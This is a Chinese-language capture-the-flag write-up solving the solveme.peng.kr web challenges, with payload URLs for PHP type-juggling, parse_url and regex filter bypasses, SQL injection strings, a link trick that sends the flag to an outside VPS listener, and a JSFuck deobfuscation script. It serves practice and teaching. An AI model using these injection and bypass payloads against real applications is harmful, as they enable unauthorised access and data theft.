NEKO

slove me wp

2018/03/15

http://solveme.peng.kr/chall

WEB

Warm up

1
2
s='1wMDEyY2U2YTY0M2NgMTEyZDQyMjAzNWczYjZgMWI4NTt3YWxmY='
print s.decode('base64').encode('hex')[::-1].decode('hex')

Bad compare

burpsuit里看到要比较的内容的16进制编码

1
http://badcompare.solveme.peng.kr/index.php?answer=%f0%ee%c2%f5%d3%fa%e5%f1%d7%cc

Winter sleep

1
//wintersleep.solveme.peng.kr/index.php?time=5.185e6

Hard login

访问index.php抓包发包
判断成功后跳转到index.php,但网页又会自动转到login.php,所以用burp截包即可

URL filtering

1
//urlfiltering.solveme.peng.kr///index.php?do_you_want_flag=yes

///path会让parse_url返回false
详情:http://skysec.top/2017/12/15/parse-url%E5%87%BD%E6%95%B0%E5%B0%8F%E8%AE%B0/

Hash collision

1
//hashcollision.solveme.peng.kr/index.php?foo[]=1&bar[]=2

数组传入sha512()会返回NULL

Array2String

1
http://array2string.solveme.peng.kr/index.php?value[]=305&value[]=309&value[]=372&value[]=360&value[]=351&value[]=328&value[]=353&value[]=355&value[]=363&value[]=361&value[]=366&value[]=359&value[]=323&value[]=353&value[]=365&value[]=368&password=simple_passw0rd

php的chr()有个特性,chr的参数会模256,所以ascii码值加上256就行了。

http://myndtt.com/2017/10/22/url%E4%B8%AD%E7%9A%84%E4%B8%8B%E5%88%92%E7%BA%BF/

1
//givemealink.solveme.peng.kr/index.php?url=http://givemealink.solveme.peng.kr:1@vps/plz%1Agive%1Ame

在服务器的/var/log/apache2/access.log可以看到flag.

Give me a link2

参考:http://chaneyoon.tistory.com/365?category=727046
需要用到ip to int 的知识:https://www.cnblogs.com/vovlie/archive/2012/10/17/2727029.html
php中:ip2long($ip)
因为$parse[‘host’]只能是loaclhost或127开头的ip地址或者是除了.以外的字符加上端口都是不行的。

1
//givemealink2.solveme.peng.kr/index.php?url=http://int形式的ip:1234/plz%01give%01me

vps监听1234端口就可以收到flag了

Hell JS

简单处理下jsfuck

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
js = "..."

alpha_dict = {
'"f"': '(![]+[])[+[]]',
'"i"': '([][[]]+[])[!![]+!![]+!![]+!![]+!![]]',
'"l"': '(![]+[])[!![]+!![]]',
'"t"': '(!![]+[])[+[]]',
'"e"': '(!![]+[])[!![]+!![]+!![]]',
'"r"': '(!![]+[])[+!![]]',
'"c"': '({}+[])[!![]+!![]+!![]+!![]+!![]]',
'"o"': '({}+[])[+!![]]',
'"n"': '([][[]]+[])[+!![]]',
'"s"': '(![]+[])[!![]+!![]+!![]]',
'"u"': '(!![]+[])[!![]+!![]]',
'" "': '({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]',
'"b"': '({}+[])[!![]+!![]]',
'" "': '({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]',
'"a"': '(![]+[])[+!![]]',
'"2"': '(!![]+!![]+[])',
'"4"': '(!![]+!![]+!![]+!![]+[])',
'"7"': '(!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])',
'"y"': '(+(+!![]+"e"+(+!![])+(+[])+(+[])+(+[]))+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]',
'"0"': '(+[]+[])',
'"3"': '(!![]+!![]+!![]+[])',
'"5"': '(!![]+!![]+!![]+!![]+!![]+[])',
'"1"': '(+!![]+[])',
'"9"': '(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])',
'"8"': '(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])',
'"6"': '(!![]+!![]+!![]+!![]+!![]+!![]+[])',
'"y"': '(+(+!![]+(!![]+[])[!![]+!![]+!![]]+(+!![])+(+[])+(+[])+(+[]))+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]',
'"d"': '([][[]]+[])[!![]+!![]]',
'[3]': '[!![]+!![]+!![]]'
}

for key, value in alpha_dict.items():
js = js.replace(value, key)

clean_dict = {
'"p"': '([]["filter"]["constructor"]("return "+"location")()+[])[3]',
'"constructor"': '"c"+"o"+"n"+"s"+"t"+"r"+"u"+"c"+"t"+"o"+"r"',
'"return "': '"r"+"e"+"t"+"u"+"r"+"n"+" "',
'"filter"': '"f"+"i"+"l"+"t"+"e"+"r"',
'"fontcolor"': '"f"+"o"+"n"+"t"+"c"+"o"+"l"+"o"+"r"',
'"location"': '"l"+"o"+"c"+"a"+"t"+"i"+"o"+"n"',
'"110"': '"1"+"2"+"2","3"+"2","1"+"0"+"5","1"+"1"+"0"',
'"111"': '"1"+"1"+"1"',
'"99"': '"9"+"9"',
'"98"': '"9"+"8"',
'"57"': '"5"+"7"',
'"101"': '"1"+"0"+"1"',
'"108"': '"1"+"0"+"8"',
'"106"': '"1"+"0"+"6"',
'"61"': '"6"+"1"',
'"112"': '"1"+"1"+"2"',
'"116"': '"1"+"1"+"6"',
'"40"': '"4"+"0"',
'"34"': '"3"+"4"',
'"119"': '"1"+"1"+"9"',
'"105"': '"1"+"0"+"5"',
'"102"': '"1"+"0"+"2"',
'"125"': '"1"+"2"+"5"',
'"102"': '"1"+"0"+"2"',
'"97"': '"9"+"7"',
'"100"': '"1"+"0"+"0"',
# # '"u"': '("1"["s"+"u"+"b"]())[!![]+!![]]'
}

for key, value in clean_dict.items():
js = js.replace(value, key)

print js

将结果的

1
[]["filter"]["constructor"]([]["filter"]["constructor"]("return String")()["fromCharCode"]("4"+"7","4"+"7","3"+"2","1"+"0"+"3","111","111","100","3"+"2","106","111","98","3"+"3","1"+"0","1"+"0","108","101","116","3"+"2","102","108","97","1"+"0"+"3","3"+"2","61","3"+"2","112","1"+"1"+"4","111","1"+"0"+"9","112","116","40","34","119","1"+"0"+"4","97","116","3"+"2","105","1"+"1"+"5","3"+"2","116","1"+"0"+"4","101","3"+"2","102","108","97","1"+"0"+"3","6"+"3","34","4"+"1","5"+"9","1"+"0","1"+"0","105","102","3"+"2","40","102","108","97","1"+"0"+"3","3"+"2","61","61","61","3"+"2","34","34","4"+"1","3"+"2","1"+"2"+"3","1"+"0","1"+"0","9","97","108","101","1"+"1"+"4","116","40","34","112","108","1"+"2"+"2","3"+"2","105","1"+"1"+"0","112","1"+"1"+"7","116","34","4"+"1","5"+"9","1"+"0","1"+"0","125","3"+"2","101","108","1"+"1"+"5","101","3"+"2","105","102","3"+"2","40","102","108","97","1"+"0"+"3","3"+"2","61","61","61","3"+"2","34","102","108","97","1"+"0"+"3","1"+"2"+"3","5"+"0","4"+"9","100","102","5"+"2","97","100","5"+"1","99","101","5"+"1","4"+"9","97","102","5"+"6","5"+"2","5"+"3","99","102","57","99","100","5"+"4","97","5"+"3","101","100","100","98","98","57","4"+"9","125","34","4"+"1","3"+"2","1"+"2"+"3","1"+"0","1"+"0","9","97","108","101","1"+"1"+"4","116","40","34","98","105","1"+"1"+"0","1"+"0"+"3","111","34","4"+"1","5"+"9","1"+"0","1"+"0","125","3"+"2","101","108","1"+"1"+"5","101","3"+"2","1"+"2"+"3","1"+"0","1"+"0","9","97","108","101","1"+"1"+"4","116","40","34","119","1"+"1"+"4","111","1"+"1"+"0","1"+"0"+"3","34","4"+"1","5"+"9","1"+"0","1"+"0","125"))

放到console里执行即可

Replace filter

1
//replacefilter.solveme.peng.kr/index.php?say=%0agive_me_the_flag

.不匹配%0a换行符

anti sql

参考:http://myndtt.com/2017/11/09/%E4%B8%80%E9%81%93anti%20sql/

1
http://antisqli.thinkout.rf.gd/?id=\&pw=union all select 31337,31337,31337--%02

并没有过滤\,–加无效字符的url编码可以当做注释符

namecheck

1
//namecheck.solveme.peng.kr/index.php?name=1','1') or min('1

原文作者: n3k0

发表日期: March 15th 2018, 12:14:52

发出嘶吼: 没有魔夜2玩我要死了

CATALOG
  1. 1. WEB
    1. 1.1. Warm up
    2. 1.2. Bad compare
    3. 1.3. Winter sleep
    4. 1.4. Hard login
    5. 1.5. URL filtering
    6. 1.6. Hash collision
    7. 1.7. Array2String
    8. 1.8. Give me a link
    9. 1.9. Give me a link2
    10. 1.10. Hell JS
    11. 1.11. Replace filter
    12. 1.12. anti sql
    13. 1.13. namecheck